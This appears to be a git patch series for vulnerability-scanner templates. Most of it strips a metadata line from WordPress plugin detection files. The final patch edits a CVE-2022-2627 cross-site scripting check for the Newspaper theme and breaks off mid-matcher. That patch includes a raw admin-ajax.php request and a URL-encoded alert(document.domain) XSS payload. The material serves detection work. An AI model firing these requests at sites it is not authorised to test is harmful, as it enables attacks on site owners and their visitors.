- max-request: 1
plugin_namespace: wp-maintenance-mode
wpscan: https://wpscan.com/plugin/wp-maintenance-mode
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bfc..f89f1a20b39 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-migrate-db/
metadata:
- max-request: 1
plugin_namespace: wp-migrate-db
wpscan: https://wpscan.com/plugin/wp-migrate-db
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8f..01fb12d0ade 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-multibyte-patch/
metadata:
- max-request: 1
plugin_namespace: wp-multibyte-patch
wpscan: https://wpscan.com/plugin/wp-multibyte-patch
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955fb..1773857e158 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-optimize/
metadata:
- max-request: 1
plugin_namespace: wp-optimize
wpscan: https://wpscan.com/plugin/wp-optimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211ca..bcd1509c688 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-pagenavi/
metadata:
- max-request: 1
plugin_namespace: wp-pagenavi
wpscan: https://wpscan.com/plugin/wp-pagenavi
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1de..c6aca20a60c 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-reset/
metadata:
- max-request: 1
plugin_namespace: wp-reset
wpscan: https://wpscan.com/plugin/wp-reset
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4c..56dfdf4a597 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-reviews-plugin-for-google/
metadata:
- max-request: 1
plugin_namespace: wp-reviews-plugin-for-google
wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fbf..810fc82cdef 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-rollback/
metadata:
- max-request: 1
plugin_namespace: wp-rollback
wpscan: https://wpscan.com/plugin/wp-rollback
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc60035..783d381ed82 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-sitemap-page/
metadata:
- max-request: 1
plugin_namespace: wp-sitemap-page
wpscan: https://wpscan.com/plugin/wp-sitemap-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 2ead9068174..8bdc600063a 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-smushit/
metadata:
- max-request: 1
plugin_namespace: wp-smushit
wpscan: https://wpscan.com/plugin/wp-smushit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6a..ab61cc03388 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-statistics/
metadata:
- max-request: 1
plugin_namespace: wp-statistics
wpscan: https://wpscan.com/plugin/wp-statistics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a80..5f6fbc1f759 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-super-cache/
metadata:
- max-request: 1
plugin_namespace: wp-super-cache
wpscan: https://wpscan.com/plugin/wp-super-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78f..d67150d0389 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-user-avatar/
metadata:
- max-request: 1
plugin_namespace: wp-user-avatar
wpscan: https://wpscan.com/plugin/wp-user-avatar
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad85..beeba7ca69d 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-recaptcha/
metadata:
- max-request: 1
plugin_namespace: wpcf7-recaptcha
wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a53..c225df7bfd2 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-redirect/
metadata:
- max-request: 1
plugin_namespace: wpcf7-redirect
wpscan: https://wpscan.com/plugin/wpcf7-redirect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f4884..aaad04cb765 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpforms-lite/
metadata:
- max-request: 1
plugin_namespace: wpforms-lite
wpscan: https://wpscan.com/plugin/wpforms-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd82..ff750a7d2a3 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wps-hide-login/
metadata:
- max-request: 1
plugin_namespace: wps-hide-login
wpscan: https://wpscan.com/plugin/wps-hide-login
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e2..f1e7595ccd4 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpvivid-backuprestore/
metadata:
- max-request: 1
plugin_namespace: wpvivid-backuprestore
wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600a..4b2769ee467 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/yith-woocommerce-wishlist/
metadata:
- max-request: 1
plugin_namespace: yith-woocommerce-wishlist
wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
tags: tech,wordpress,wp-plugin,top-100,top-200
From b049cda79e8cf1f32fd0a862b902a0e96bbe699e Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 1 Sep 2023 14:04:34 +0530
Subject: [PATCH 23/30] misc update
---
http/cves/2022/CVE-2022-2627.yaml | 23 +++++++++++------------
1 file changed, 11 insertions(+), 12 deletions(-)
diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml
index 0485651b64e..cde3093c967 100644
--- a/http/cves/2022/CVE-2022-2627.yaml
+++ b/http/cves/2022/CVE-2022-2627.yaml
@@ -1,8 +1,8 @@
id: CVE-2022-2627
info:
- name: WordPress Newspaper <12 - Cross-Site Scripting
- author: ramondunker
+ name: WordPress Newspaper < 12 - Cross-Site Scripting
+ author: ramondunker,c4sper0
severity: medium
description: |
WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
@@ -26,26 +26,25 @@ info:
http:
- raw:
- |
- POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/2
+ POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1
Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
- action=td_ajax_search&td_string=tej2j1q%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3emvufr
+ action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=
+
+ payloads:
+ xss_payload:
+ - ""
matchers-condition: and
matchers:
- type: word
part: body
words:
- - ''
- - '/newspaper'
- case-insensitive: true
+ -